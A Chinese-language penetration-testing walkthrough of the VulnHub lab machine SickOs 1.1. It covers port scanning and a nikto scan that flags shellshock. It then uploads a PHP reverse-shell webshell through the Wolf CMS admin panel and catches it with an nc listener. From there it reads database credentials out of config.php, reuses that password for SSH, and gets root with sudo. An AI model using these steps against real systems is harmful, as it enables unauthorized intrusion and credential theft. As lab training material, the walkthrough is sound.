下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z
目标机器地址:192.168.243.137
攻击机器地址:192.168.18.148
目录
信息收集
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open http-proxy Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
MAC Address: 00:0C:29:C6:40:31 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
扫描
root@kali:~# nikto -h 192.168.243.137 -useproxy 192.168.243.137:3128
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
根据3128端口
在浏览器上
设置代理
wolfcms
发现存在CMS。。。那么管理员界面呢?
发现files 面板下的权限
上传木马 并且 访问【木马可使用 /usr/share/webshells/php-reverse-shell.php】
http://192.168.243.137/wolfcms/public/php-reverse-shell_1.php
NC 监听
nc -lnvp 443
反弹 shell
查看一下:$ cat /var/www/wolfcms/config.php
发现数据库账户
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', john@123');
SSH登录
由于22端口开着,可以ssh
root@kali:~# ssh sickos@192.168.243.137
密码:john@123
sudo提权
sudo su root
密码:john@123
得到flag